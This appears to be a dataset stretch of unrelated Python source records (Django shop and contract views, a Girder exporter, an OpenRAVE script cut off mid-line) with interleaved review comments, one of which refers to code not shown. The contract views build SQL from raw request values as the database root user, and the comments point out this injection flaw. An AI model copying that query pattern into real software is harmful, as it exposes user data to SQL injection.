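The wordcount dampening inside `on_message` above is easy to exercise on its own. A minimal standalone sketch of that heuristic (the thresholds 15 and 3 and the `log` collapse are copied from the cog; the function name is made up for illustration):

import math

def effective_wordcount(content):
    # Same tokenization the cog uses: whitespace-separated words.
    wordcount = len(content.strip(" ").split(" "))
    # Long messages made of very short "words" look like count-padding,
    # so their contribution collapses to roughly log(n).
    if wordcount >= 15:
        avg_word_length = (len(content) - wordcount + 1) / wordcount
        if avg_word_length < 3:
            wordcount = round(math.log(wordcount))
    return wordcount

print(effective_wordcount("this is a perfectly ordinary sentence"))  # 6
print(effective_wordcount("a " * 50))                                # 4, not 50
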
+{"seq_id":"22053304","text":"import logging\nfrom rest_framework import generics, serializers, viewsets, mixins\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom rest_framework.permissions import AllowAny, IsAuthenticated\nfrom rest_framework import filters\nfrom api.models import Category, Product, Order, Review, Provider\nfrom api.serializers import CategorySerializer, ProductSerializer, OrderSerializer, ReviewSerializer, UserProfileSerializer, UserSerializer, ProviderSerializer\nfrom django.shortcuts import get_object_or_404\nfrom django.shortcuts import render\n\nlogger = logging.getLogger('api')\n\n@api_view(['GET', 'POST'])\ndef categories_view(request): #1 FBV\n if request.method == 'GET':\n categories = Category.objects.all()\n serializer = CategorySerializer(categories, many=True)\n return Response(serializer.data, status=200)\n elif request.method == 'POST':\n serializer = CategorySerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=201)\n return Response(serializer.errors, status=500)\n\n\n@api_view(['GET', 'PUT', 'DELETE'])\ndef category_view(request, pk): #2 FBV\n category = get_object_or_404(Category, pk=pk)\n if request.method == 'GET':\n serializer = CategorySerializer(category)\n return Response(serializer.data)\n elif request.method == 'PUT':\n serializer = CategorySerializer(instance=category, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n elif request.method == 'DELETE':\n category.delete()\n return Response(status=204)\n\n\nclass CategoryViewSet(viewsets.ViewSet):\n permission_classes = (IsAuthenticated, )\n\n def list(self, request):\n queryset = Category.objects.all()\n serializer = CategorySerializer(queryset, many=True)\n return Response(serializer.data)\n\n def retrieve(self, request, pk=None):\n queryset = Category.objects.all()\n user = get_object_or_404(queryset, pk=pk)\n serializer = CategorySerializer(user)\n return Response(serializer.data)\n\n def create(self, request):\n category_data = request.data\n category = Category.objects.create(name=category_data['name'])\n category.save()\n serializer = CategorySerializer(category)\n logger.debug(f'Category {serializer.instance} was created')\n logger.info(f'Category {serializer.instance} was created')\n return Response(serializer.data)\n\n def destroy(self, request, pk):\n try:\n instance = Category.objects.get(id=pk)\n instance.delete()\n logger.debug(f'Category {instance} was deleted')\n logger.info(f'Category {instance} was deleted')\n except:\n logger.error(f'Category {instance} cannot be deleted')\n return Response()\n\n def update(self, request, pk):\n category = Category.objects.get(id=pk)\n category.name = request.data['name']\n category.save()\n serializer = CategorySerializer(category)\n logger.debug(f'Category {serializer.instance} was updated')\n logger.info(f'Category {serializer.instance} was updated')\n return Response(serializer.data)\n\n\nclass ProviderViewSet(viewsets.ViewSet):\n permission_classes = (IsAuthenticated, )\n\n def list(self, request):\n queryset = Provider.objects.all()\n serializer = ProviderSerializer(queryset, many=True)\n return Response(serializer.data)\n\n def retrieve(self, request, pk=None):\n queryset = Provider.objects.all()\n user = get_object_or_404(queryset, pk=pk)\n serializer = ProviderSerializer(user)\n return Response(serializer.data)\n\n def 
create(self, request):\n provider_data = request.data\n provider = Provider.objects.create(name=provider_data['name'], description = provider_data['description'])\n provider.save()\n serializer = ProviderSerializer(provider)\n logger.debug(f'Provider {serializer.instance} was created')\n logger.info(f'Provider {serializer.instance} was created')\n return Response(serializer.data)\n\n def destroy(self, request, pk):\n try:\n instance = Provider.objects.get(id=pk)\n instance.delete()\n logger.debug(f'Provider {instance} was deleted')\n logger.info(f'Provider {instance} was deleted')\n except:\n logger.error(f'Provider {instance} cannot be deleted')\n return Response()\n\n def update(self, request, pk):\n provider = Provider.objects.get(id=pk)\n provider.name = request.data['name']\n provider.description = request.data['description']\n provider.save()\n serializer = ProviderSerializer(provider)\n logger.debug(f'Provider {serializer.instance} was updated')\n logger.info(f'Provider {serializer.instance} was updated')\n return Response(serializer.data)\n\n\n\nclass CategoryProductsView(APIView): #1 CBV\n filter_backends = (filters.OrderingFilter,)\n ordering = ('price', )\n\n def get(self, request, pk):\n category = get_object_or_404(Category, pk=pk)\n products = category.category_products.all()\n serializer = ProductSerializer(products, many=True)\n return Response(serializer.data)\n\nclass ProviderProductsView(APIView): #2 CBV\n def get(self, request, pk):\n provider = get_object_or_404(Provider, pk=pk)\n products = provider.provider_products.all()\n serializer = ProductSerializer(products, many=True)\n return Response(serializer.data)\n\nclass ProductViewSet(viewsets.ViewSet): #3 viewset\n #permission_classes = (IsAuthenticated, )\n\n def list(self, request):\n queryset = Product.objects.all()\n serializer = ProductSerializer(queryset, many=True)\n return Response(serializer.data)\n\n def retrieve(self, request, pk=None):\n queryset = Product.objects.all()\n user = get_object_or_404(queryset, pk=pk)\n serializer = ProductSerializer(user)\n return Response(serializer.data)\n\n def create(self, request):\n product_data = request.data\n category = Category.objects.get(id = product_data['category'])\n provider = Provider.objects.get(id = product_data['provider'])\n product = Product.objects.create(name=product_data['name'], description = product_data['description'], category = category, provider = provider, image = product_data['image'], price = product_data['price'] )\n product.save()\n serializer = ProductSerializer(product)\n logger.debug(f'Product {serializer.instance} was created')\n logger.info(f'Product {serializer.instance} was created')\n return Response(serializer.data)\n\n def destroy(self, request, pk):\n try:\n instance = Product.objects.get(id=pk)\n instance.delete()\n logger.debug(f'Product {instance} was deleted')\n logger.info(f'Product {instance} was deleted')\n except:\n logger.error(f'Product {instance} cannot be deleted')\n return Response()\n\n def update(self, request, pk):\n product = Product.objects.get(id=pk)\n category = Category.objects.get(id = request.data['category'])\n provider = Provider.objects.get(id = request.data['provider'])\n\n product.name = request.data['name']\n product.description = request.data['description']\n product.price = request.data['price']\n product.provider = provider\n product.category = category\n product.image = request.data['image']\n product.save()\n serializer = ProductSerializer(product)\n logger.debug(f'Product {serializer.instance} 
was updated')\n logger.info(f'Product {serializer.instance} was updated')\n return Response(serializer.data)\n\n\n \nclass ProductView(APIView): #3 CBV\n def get(self, request, pk):\n product = get_object_or_404(Product, pk=pk)\n serializer = ProductSerializer(product)\n return Response(serializer.data)\n\n def put(self, request, pk):\n product = get_object_or_404(Product, pk=pk)\n serializer = ProductSerializer(instance=product, data=request.data)\n if serializer.is_valid():\n serializer.save()\n logger.info(f'Product with ID {serializer.instance} was updated')\n logger.debug(f'Product with ID {serializer.instance} was updated')\n return Response(serializer.data)\n\n logger.error(f'Product with ID {serializer.instance} cannot be updated')\n return Response(serializer.errors, status=500)\n\n def delete(self, request, pk):\n product = get_object_or_404(Product, pk=pk)\n product.delete()\n return Response(status=204)\n\n\nclass ReviewViewSet(viewsets.ViewSet): #4 viewset\n permission_classes = (IsAuthenticated, )\n def list(self, request):\n queryset = Review.objects.all()\n serializer = ReviewSerializer(queryset, many=True)\n return Response(serializer.data)\n\n def retrieve(self, request, pk=None):\n queryset = Review.objects.all()\n user = get_object_or_404(queryset, pk=pk)\n serializer = ReviewSerializer(user)\n return Response(serializer.data)\n\n def create(self, request):\n review_data = request.data\n review = Review.objects.create(text=review_data['text'], author = self.request.user)\n review.save()\n serializer = ReviewSerializer(review)\n logger.debug(f'Review {serializer.instance} was created')\n logger.info(f'Review {serializer.instance} was created')\n return Response(serializer.data)\n\n def destroy(self, request, pk):\n try:\n instance = Review.objects.for_user(self.request.user).get(id=pk)\n instance.delete()\n logger.debug(f'Review {instance} was deleted')\n logger.info(f'Review {instance} was deleted')\n except:\n logger.error(f'Review {instance} cannot be deleted')\n return Response()\n\n def update(self, request, pk):\n review = Review.objects.for_user(self.request.user).get(id=pk)\n review.text = request.data['text']\n review.save()\n serializer = ReviewSerializer(review)\n logger.debug(f'Review {serializer.instance} was updated')\n logger.info(f'Review {serializer.instance} was updated')\n return Response(serializer.data)\n \nclass ReviewsView(generics.ListCreateAPIView): #4 CBV\n serializer_class = ReviewSerializer\n permission_classes = (IsAuthenticated, )\n\nclass OrdersView(generics.ListCreateAPIView): #5 CBV\n serializer_class = OrderSerializer\n permission_classes = (IsAuthenticated,)\n\n def get_queryset(self):\n return Order.objects.for_user(self.request.user)\n\n def perform_create(self, serializer):\n serializer.save(user=self.request.user)\n\n\nclass OrderViewSet(viewsets.ViewSet): #5 viewset\n permission_classes = (IsAuthenticated, )\n def list(self, request):\n queryset = Order.objects.for_user(self.request.user)\n serializer = OrderSerializer(queryset, many=True)\n return Response(serializer.data)\n\n def retrieve(self, request, pk=None):\n queryset = Order.objects.for_user(self.request.user)\n user = get_object_or_404(queryset, pk=pk)\n serializer = OrderSerializer(user)\n return Response(serializer.data)\n\n def create(self, request):\n order_data = request.data\n order = Order.objects.create(product_name=order_data['product_name'], count = order_data['count'], user = self.request.user)\n order.save()\n serializer = OrderSerializer(order)\n 
logger.debug(f'Order {serializer.instance} was created')\n logger.info(f'Order {serializer.instance} was created')\n return Response(serializer.data)\n\n def destroy(self, request, pk):\n try:\n instance = Order.objects.get(id=pk)\n instance.delete()\n logger.debug(f'Order {instance} was deleted')\n logger.info(f'Order {instance} was deleted')\n except:\n logger.error(f'Order {instance} cannot be deleted')\n return Response()\n\n def update(self, request, pk):\n order = Order.objects.get(id=pk)\n order.product_name = request.data['product_name']\n order.count = request.data['count']\n order.save()\n serializer = OrderSerializer(order)\n logger.debug(f'Order {serializer.instance} was updated')\n logger.info(f'Order {serializer.instance} was updated')\n return Response(serializer.data)\n\n","sub_path":"onlineshop_back/api/views/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
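
One caveat in the `destroy` methods above: `instance` is referenced inside a bare `except:` even when the initial lookup is what failed, so a missing id raises `NameError` rather than being logged. A sketch of a narrower variant, shown for `Category` (the status codes are a choice of this sketch, not part of the original; the same shape applies to the other viewsets):

def destroy(self, request, pk):
    try:
        instance = Category.objects.get(id=pk)
    except Category.DoesNotExist:
        # The lookup itself failed; there is no instance to mention.
        logger.error(f'Category with id={pk} does not exist')
        return Response(status=404)
    instance.delete()
    logger.info(f'Category {instance} was deleted')
    return Response(status=204)
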
+{"seq_id":"352268855","text":"import json\nimport logging\nimport pymysql\nfrom django.contrib import auth\nfrom django.views.decorators.http import require_POST\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import JsonResponse\nfrom inputDataHandler.inputDataHandler import InputDataHandler\nfrom script.count import LaunchScriptToCount\nfrom settings import PASSWORD, HOST_ADDRESS\n\n\n# Ajax на поиск договоров обращается сюда\n@require_POST\n@login_required\ndef search(request):\n contracts = None\n facial_id = request.POST.get('id')\n logging.info(\"Пользователь %s получает информацию о договорах для лицеового счета чей id = %s\",\n auth.get_user(request).username,\n facial_id)\n\n current_table = auth.get_user(request).userprofile.current_table\n\n if facial_id != \"\":\n search_for = \" AND ctf.facial_id = \" + facial_id\n\n connect = pymysql.connect(host=HOST_ADDRESS, user='root', password=PASSWORD, charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor)\n cur = connect.cursor()\n cur.execute(\"SELECT \"\n \"c.id, \"\n \"cc.number, \"\n \"DATE_FORMAT(c.registry_date, '%d.%m.%Y') AS registry_date, \"\n \"DATE_FORMAT(c.finish_date, '%d.%m.%Y') AS finish_date, \"\n \"c.living_amount, \"\n \"c.living_square, \"\n \"c.description \"\n \"FROM \" + current_table + \".contract_to_facial AS ctf \" +\n \"LEFT JOIN \" + current_table + \".contract AS c \" +\n \"ON ctf.contract_id = c.id \"\n \"LEFT JOIN \" + current_table + \".contract_capacity AS cc \" +\n \"ON cc.id = c.contract_capacity_id \"\n \"WHERE c.deleted_id = 0\" + search_for)\n contracts = cur.fetchall()\n cur.close()\n connect.close()\n\n contracts = {\"contracts\": contracts}\n print(contracts)\n\n return JsonResponse(contracts, safe=False)\n\n\n# Ajax на обнавелние договоров обращается сюда\n@require_POST\n@login_required\ndef update(request):\n data = json.loads(request.POST.get('data'))\n connect = pymysql.connect(host=HOST_ADDRESS, user='root', password=PASSWORD, charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor)\n\n for contract in data.get('events'):\n contract_id = contract.get('id')\n\n prefix = auth.get_user(request).userprofile.prefix\n current_table = auth.get_user(request).userprofile.current_table\n\n logging.info(\"Пользователь %s изменяет информацию о договоре чей id = %s\",\n auth.get_user(request).username,\n contract_id)\n\n data_handler = InputDataHandler()\n data_handler2 = InputDataHandler()\n\n if contract_id is not None:\n search_for = \" id=\" + str(contract_id)\n\n data_handler2.make_what_to_update_line_for_SQL(contract.get('number'), \"number\", False)\n\n data_handler.make_what_to_update_line_for_SQL(contract.get('reg-date'), \"registry_date\", True)\n data_handler.make_what_to_update_line_for_SQL(contract.get('fin-date'), \"finish_date\", True)\n data_handler.make_what_to_update_line_for_SQL(contract.get('square'), \"living_square\", False)\n data_handler.make_what_to_update_line_for_SQL(contract.get('amount'), \"living_amount\", False)\n data_handler.make_what_to_update_line_for_SQL(contract.get('notice'), \"description\", False)\n\n if data_handler.get_what_to_update() != \"\":\n cur = connect.cursor()\n cur.execute(\"UPDATE \"\n + current_table + \".contract \" +\n \"SET \"\n + data_handler.get_what_to_update() +\n \" WHERE\" + search_for)\n\n if data_handler2.get_what_to_update() != \"\":\n cur = connect.cursor()\n cur.execute(\"UPDATE \"\n + current_table + \".contract_capacity \" +\n \"SET \"\n + data_handler2.get_what_to_update() +\n \" WHERE\" + 
search_for)\n\n LaunchScriptToCount().count(prefix, current_table)\n\n cur.close()\n connect.close()\n\n return JsonResponse(\"{'status':'ok'}\", safe=False)\n\n\n# Ajax contract-creation requests are routed here\n@require_POST\n@login_required\ndef add(request):\n data = json.loads(request.POST.get('data'))\n\n current_table = auth.get_user(request).userprofile.current_table\n\n connect = pymysql.connect(host=HOST_ADDRESS, user='root', password=PASSWORD, charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor)\n cur = connect.cursor()\n\n number = data.get('number')\n\n if number is not None:\n cur.execute(\"SELECT \"\n \"id \"\n \"FROM contract_capacity \"\n \"WHERE busy = 1 AND number =\" + number)\n number_row = cur.fetchone()\n if number_row is not None:\n return JsonResponse(\"{'status': 'already exist'}\", safe=False)\n\n logging.info(\"User %s adds a contract with number = %s\",\n auth.get_user(request).username,\n number)\n\n data_handler = InputDataHandler()\n\n data_handler.make_what_to_insert_line_for_SQL(number, False)\n data_handler.make_what_to_insert_line_for_SQL(\"1\", False)\n\n data_handler.make_insert_into(number, 'number')\n data_handler.make_insert_into(\"1\", 'busy')\n\n cur.execute(\"INSERT INTO \"\n + current_table + \".contract_capacity \" +\n \"( \"\n + data_handler.get_insert_into() +\n \") \"\n \"VALUES \"\n \"( \"\n + data_handler.get_what_to_insert() +\n \")\")\n\n cur.execute(\"SELECT LAST_INSERT_ID() AS id\")\n contract_capacity_id = cur.fetchone()['id']\n print(contract_capacity_id)\n\n data_handler2 = InputDataHandler()\n\n data_handler2.make_what_to_insert_line_for_SQL(\"0\", False)\n data_handler2.make_what_to_insert_line_for_SQL(contract_capacity_id, False)\n data_handler2.make_what_to_insert_line_for_SQL(data.get('registry-date'), True)\n data_handler2.make_what_to_insert_line_for_SQL(\"0\", False)\n data_handler2.make_what_to_insert_line_for_SQL(data.get('tariff-scheme-id'), False)\n data_handler2.make_what_to_insert_line_for_SQL(data.get('finish-date'), True)\n data_handler2.make_what_to_insert_line_for_SQL(data.get('nds-rate'), False)\n data_handler2.make_what_to_insert_line_for_SQL(data.get('fine-rate'), False)\n data_handler2.make_what_to_insert_line_for_SQL(data.get('over-draft'), False)\n data_handler2.make_what_to_insert_line_for_SQL(data.get('text'), False)\n data_handler2.make_what_to_insert_line_for_SQL(data.get('template-id'), False)\n data_handler2.make_what_to_insert_line_for_SQL(data.get('living-amount'), False)\n data_handler2.make_what_to_insert_line_for_SQL(data.get('living-square'), False)\n data_handler2.make_what_to_insert_line_for_SQL(\"0\", False)\n data_handler2.make_what_to_insert_line_for_SQL(data.get('description'), False)\n data_handler2.make_what_to_insert_line_for_SQL(\"now()\", False)\n\n data_handler2.make_insert_into(\"0\", 'deleted_id')\n data_handler2.make_insert_into(contract_capacity_id, 'contract_capacity_id')\n data_handler2.make_insert_into(data.get('registry-date'), 'registry_date')\n data_handler2.make_insert_into(\"0\", 'registry-operator')\n data_handler2.make_insert_into(data.get('tariff-scheme-id'), 'tariff_scheme_id')\n data_handler2.make_insert_into(data.get('finish-date'), 'finish_date')\n data_handler2.make_insert_into(data.get('nds-rate'), 'nds_rate')\n data_handler2.make_insert_into(data.get('fine-rate'), 'fine_rate')\n data_handler2.make_insert_into(data.get('over-draft'), 'over_draft')\n data_handler2.make_insert_into(data.get('text'), 'text')\n 
data_handler2.make_insert_into(data.get('template-id'), 'template_id')\n data_handler2.make_insert_into(data.get('living-amount'), 'living-amount')\n data_handler2.make_insert_into(data.get('living-square'), 'living-square')\n data_handler2.make_insert_into(\"0\", 'access-group-id')\n data_handler2.make_insert_into(data.get('description'), 'description')\n data_handler2.make_insert_into(\"now()\", 'create_date')\n\n cur.execute(\"INSERT INTO \"\n + current_table + \".contract \" +\n \"( \"\n + data_handler2.get_insert_into() +\n \") \"\n \"VALUES \"\n \"( \"\n + data_handler2.get_what_to_insert() +\n \")\")\n\n cur.close()\n connect.close()\n\n return JsonResponse(\"{'status': 'ok'}\", safe=False)\n","sub_path":"contract/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
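
The queries above splice request values such as `facial_id` and `number` directly into SQL text. With pymysql the values can instead be bound through `%s` placeholders, which also removes the quoting problems; only identifiers like the schema name cannot be parameters and still need whitelisting. A sketch of the `search` lookup rewritten that way (column list shortened for brevity):

# current_table must still come from a trusted whitelist: placeholders
# only work for values, never for schema or table identifiers.
sql = ("SELECT c.id, cc.number "
       "FROM " + current_table + ".contract_to_facial AS ctf "
       "LEFT JOIN " + current_table + ".contract AS c ON ctf.contract_id = c.id "
       "WHERE c.deleted_id = 0 AND ctf.facial_id = %s")
cur.execute(sql, (facial_id,))
contracts = cur.fetchall()
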
+{"seq_id":"414168517","text":"def split_orders(orders_data, working_hours):\n av_orders = []\n un_orders = []\n for order in orders_data:\n find = False\n for st2, fn2 in order['delivery_hours']:\n for st1, fn1 in working_hours:\n if st2 <= st1 and fn1 <= fn2:\n av_orders.append(order)\n find = True\n break\n if find:\n break\n if not find:\n un_orders.append(order['_id'])\n return av_orders, un_orders\n","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"528527171","text":"from hashlib import sha256, md5\nimport json\nimport magic\nimport os\nimport requests\nfrom girder.utility import hash_state, ziputil, JsonEncoder\nfrom girder.models.folder import Folder\nfrom girder.constants import AccessType\nfrom ..license import WholeTaleLicense\n\n\nclass HashFileStream:\n \"\"\"Generator that computes md5 and sha256 of data returned by it\"\"\"\n\n def __init__(self, gen):\n \"\"\"\n This class is primarily meant to wrap Girder's download function,\n which returns iterators, hence self.x = x()\n \"\"\"\n try:\n self.gen = gen()\n except TypeError:\n self.gen = gen\n self.state = {\n 'md5': hash_state.serializeHex(md5()),\n 'sha256': hash_state.serializeHex(sha256()),\n }\n\n def __iter__(self):\n return self\n\n def __next__(self):\n nxt = next(self.gen)\n for alg in self.state.keys():\n checksum = hash_state.restoreHex(self.state[alg], alg)\n checksum.update(nxt)\n self.state[alg] = hash_state.serializeHex(checksum)\n return nxt\n\n def __call__(self):\n \"\"\"Needs to be callable, see comment in __init__\"\"\"\n return self\n\n @property\n def sha256(self):\n return hash_state.restoreHex(self.state['sha256'], 'sha256').hexdigest()\n\n @property\n def md5(self):\n return hash_state.restoreHex(self.state['md5'], 'md5').hexdigest()\n\n\nclass TaleExporter:\n default_top_readme = \"\"\"This zip file contains the code, data, and information about a Tale.\n\n Directory Structure:\n metadata/: Holds information about the runtime environment and Tale attributes\n workspace/: Contains the files and folders that were used in the Tale\n LICENSE: The license that the code and data falls under\n README.md: This file\"\"\"\n default_bagit = \"BagIt-Version: 0.97\\nTag-File-Character-Encoding: UTF-8\\n\"\n\n def __init__(self, user, manifest, environment, algs=None):\n self.user = user\n self.manifest = manifest\n self.environment = environment\n\n if algs is None:\n self.algs = [\"md5\", \"sha1\", \"sha256\"]\n\n zipname = os.path.basename(manifest[\"dct:hasVersion\"][\"@id\"])\n self.zip_generator = ziputil.ZipGenerator(zipname)\n license_spdx = next(\n (\n agg[\"schema:license\"]\n for agg in manifest[\"aggregates\"]\n if \"schema:license\" in agg\n ),\n WholeTaleLicense.default_spdx()\n )\n self.tale_license = WholeTaleLicense().license_from_spdx(license_spdx)\n self.state = {}\n for alg in self.algs:\n self.state[alg] = []\n\n def list_files(self):\n \"\"\"\n List contents of the version workspace and run directories.\n\n Returns a tuple for each file:\n fullpath - absolute path to a file\n relpath - path to a file relative to workspace root\n \"\"\"\n for obj in [self.manifest[\"dct:hasVersion\"]] + self.manifest[\"wt:hasRecordedRuns\"]:\n uri = obj[\"@id\"]\n obj_type = obj[\"@type\"]\n obj_id = uri.rsplit(\"/\", 1)[-1]\n folder = Folder().load(obj_id, user=self.user, level=AccessType.READ)\n workspace_path = folder[\"fsPath\"] + \"/workspace\"\n for curdir, _, files in os.walk(workspace_path):\n for fname in files:\n fullpath = os.path.join(curdir, fname)\n if obj_type == \"wt:RecordedRun\":\n relpath = fullpath.replace(workspace_path, \"runs/\" + obj[\"schema:name\"])\n else:\n relpath = fullpath.replace(workspace_path, \"workspace\")\n yield fullpath, relpath\n\n @staticmethod\n def bytes_from_file(filename, chunksize=8192):\n with open(filename, mode=\"rb\") as f:\n while True:\n chunk = f.read(chunksize)\n if chunk:\n yield chunk\n else:\n break\n\n def stream(self):\n raise NotImplementedError\n\n @staticmethod\n def 
stream_string(string):\n return (_.encode() for _ in (string,))\n\n def dump_and_checksum(self, func, zip_path):\n hash_file_stream = HashFileStream(func)\n for data in self.zip_generator.addFile(hash_file_stream, zip_path):\n yield data\n # MD5 is the only required alg in profile. See Manifests-Required in\n # https://raw.githubusercontent.com/fair-research/bdbag/master/profiles/bdbag-ro-profile.json\n self.state['md5'].append((zip_path, hash_file_stream.md5))\n\n def _agg_index_by_uri(self, uri):\n aggs = self.manifest[\"aggregates\"]\n return next((i for (i, d) in enumerate(aggs) if d['uri'] == uri), None)\n\n def append_aggergate_checksums(self):\n \"\"\"\n Takes the md5 checksums and adds them to the files in the 'aggregates' section\n :return: None\n \"\"\"\n aggs = self.manifest[\"aggregates\"]\n for path, chksum in self.state['md5']:\n uri = \"./\" + path.replace(\"data/\", \"\", 1)\n index = self._agg_index_by_uri(uri)\n if index is not None:\n aggs[index]['wt:md5'] = chksum\n self.verify_aggregate_checksums()\n\n def verify_aggregate_checksums(self):\n \"\"\"Check if every aggregate has a proper checksum.\"\"\"\n algs = {f\"wt:{alg}\" for alg in self.algs}\n for index, agg in enumerate(self.manifest[\"aggregates\"]):\n if algs - set(agg.keys()) == algs:\n try:\n req = requests.get(agg[\"uri\"], allow_redirects=True, stream=True)\n except requests.exceptions.InvalidSchema:\n # globus...\n continue\n md5sum = md5()\n for chunk in req.iter_content(chunk_size=4096):\n md5sum.update(chunk)\n self.manifest[\"aggregates\"][index][\"wt:md5\"] = md5sum.hexdigest()\n\n def append_aggregate_filesize_mimetypes(self):\n \"\"\"\n Adds the file size and mimetype to the workspace files\n :return: None\n \"\"\"\n magic_wrapper = magic.Magic(mime=True, uncompress=True)\n aggs = self.manifest[\"aggregates\"]\n for fullpath, relpath in self.list_files():\n uri = \"./\" + relpath\n index = self._agg_index_by_uri(uri)\n if index is not None:\n aggs[index][\"wt:mimeType\"] = (\n magic_wrapper.from_file(fullpath) or \"application/octet-stream\"\n )\n aggs[index][\"wt:size\"] = os.path.getsize(fullpath)\n\n def append_extras_filesize_mimetypes(self, extra_files):\n \"\"\"\n Appends the mimetype and size to the extra files in the 'aggregates 'section\n :param extra_files: Dictionary of extra file names\n :type extra_files: dict\n :return: None\n \"\"\"\n aggs = self.manifest[\"aggregates\"]\n for path, content in extra_files.items():\n uri = \"./\" + path.replace(\"data/\", \"\", 1)\n index = self._agg_index_by_uri(uri)\n if index is not None:\n aggs[index][\"wt:mimeType\"] = \"text/plain\"\n aggs[index][\"wt:size\"] = len(content)\n\n @staticmethod\n def formated_dump(obj, **kwargs):\n return json.dumps(\n obj, cls=JsonEncoder, sort_keys=True, allow_nan=False, **kwargs\n )\n","sub_path":"server/lib/exporters/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
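
The hash-while-streaming pattern in `HashFileStream` is not Girder-specific; `hash_state` is only needed there because Girder persists hasher state between requests. A self-contained sketch of the same idea using plain `hashlib` (class name hypothetical):

import hashlib

class HashingStream:
    """Wrap a chunk iterator; digest every chunk as it streams through."""

    def __init__(self, gen, algs=("md5", "sha256")):
        self.gen = iter(gen)
        self.hashers = {alg: hashlib.new(alg) for alg in algs}

    def __iter__(self):
        return self

    def __next__(self):
        chunk = next(self.gen)
        for hasher in self.hashers.values():
            hasher.update(chunk)
        return chunk

    def hexdigest(self, alg):
        return self.hashers[alg].hexdigest()

stream = HashingStream([b"hello ", b"world"])
payload = b"".join(stream)  # consume once; digests accumulate on the way
assert stream.hexdigest("md5") == hashlib.md5(b"hello world").hexdigest()
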
+{"seq_id":"168949278","text":"#!/usr/bin/env python2\n\n# File: test_or.py\n# Author: Chris Dellin \n# Copyright: 2015 Carnegie Mellon University\n# License: BSD\n\nfrom __future__ import print_function, unicode_literals, absolute_import, division\n\nimport atexit\nimport sys\nimport time\nimport numpy\nimport openravepy\n\nlambda_ = 0.0001\n#lambda_ = 0.5\n#lambda_ = 0.9999\nw_inter_step = False\nw_selfcc = False\n\n# hardcoded poses (openrave order, qw qx qy qz x y z)\nR12 = numpy.sqrt(0.5)\nT = lambda pose: openravepy.matrixFromPose(pose)\nT_r = T([ R12, 0., 0., -R12, -0.3975, 2.38, 0. ])\nT_table = T([ R12, 0., 0., -R12, -0.3975, 1.61, 0. ])\nT_bin = T([ R12, 0., 0., -R12, -1.1, 2.3, 0. ])\nT_ee_palm = T([ 1., 0., 0., 0., 0., 0., 0.1365 ])\nT_mug_grasp1 = T([ 0.5,-0.5,-0.5, 0.5, 0.15, 0., 0.09 ])\nT_mugT = T([ 0., 0., 0., 1., -0.3975, 1.61, 0.735 ]) # table\nT_mugD = T([-R12, 0., 0., R12, -1.1, 2.3, 0.0 ]) # bin\nT_mug_drop = T([-R12, 0., 0., R12, -1.1, 2.3, 0.735 ]) # drop location\n# robot dof values\nr_dofvals = [\n 5.759, -1.972, -0.22, 1.9, 0., 0., 0., 1.3,1.3,1.3,0., # right\n 0.630, -1.900, 0.15, 1.9, 0., 0., 0., 2.3,2.3,2.3,0. # left\n]\n\n# create an environment, load the robot (wam)\nopenravepy.RaveInitialize(True, level=openravepy.DebugLevel.Info)\natexit.register(openravepy.RaveDestroy)\ne = openravepy.Environment()\natexit.register(e.Destroy)\n\n#e.SetViewer('qtcoin')\n\n# load a robot, ik solver\nr = e.ReadRobotXMLFile('robots/herb2_padded_nosensors.robot.xml')\ne.Add(r)\nr.SetTransform(T_r)\nr.SetDOFValues(r_dofvals,range(len(r_dofvals)))\nr.SetActiveManipulator('right_wam')\nr.SetActiveDOFs(r.GetActiveManipulator().GetArmIndices())\nikmodel = openravepy.databases.inversekinematics.InverseKinematicsModel(r,\n iktype=openravepy.IkParameterization.Type.Transform6D)\nif not ikmodel.load():\n ikmodel.autogenerate()\n\n# HACK\nfor joint in r.GetJoints():\n joint.SetResolution(0.05)\n\n# do some sweet stuff\nif False:\n m = openravepy.RaveCreateModule(e, 'SubsetManager')\n e.Add(m, False, 'ssm')\n m.SendCommand('TagCurrentSubset {} selfcc true'.format(r.GetName()))\n p = openravepy.RaveCreatePlanner(e, 'MultiSetPRM')\n p.SendCommand('UseSubsetManager ssm')\n pp_self = openravepy.Planner.PlannerParameters()\n pp_self.SetExtraParameters('1')\n p.InitPlan(r, pp_self)\n t = openravepy.RaveCreateTrajectory(e, '')\n p.PlanPath(t)\n p.SendCommand('CacheSetLocation mycache')\n p.SendCommand('CacheSave')\n print('bailing super early!')\n exit()\n\n# add fixed objects (kitchen, table, bin)\nkbs = {}\nkbs['kitchen'] = e.ReadKinBodyXMLFile('environments/pr_kitchen.kinbody.xml')\nkbs['table'] = e.ReadKinBodyXMLFile('objects/furniture/table_zup.kinbody.xml')\nkbs['bin'] = e.ReadKinBodyXMLFile('objects/household/recyclingbin-zlevel.kinbody.xml')\nkbs['mug'] = e.ReadKinBodyXMLFile('objects/household/mug2.kinbody.xml')\nfor name,kb in kbs.items():\n if not kb:\n raise RuntimeError('kinbody {} not found!'.format(name))\n e.Add(kb)\nkbs['table'].SetTransform(T_table)\nkbs['bin'].SetTransform(T_bin)\n\n# get iks for mug on table\nkbs['mug'].SetTransform(T_mugT)\nH = numpy.dot(\n numpy.dot(kbs['mug'].GetTransform(), T_mug_grasp1),\n numpy.linalg.inv(T_ee_palm)\n )\nmugiksT = r.GetActiveManipulator().FindIKSolutions(H, openravepy.IkFilterOptions.CheckEnvCollisions)\n\n# get iks for mug at drop location\nkbs['mug'].SetTransform(T_mug_drop)\nH = numpy.dot(\n numpy.dot(kbs['mug'].GetTransform(), T_mug_grasp1),\n 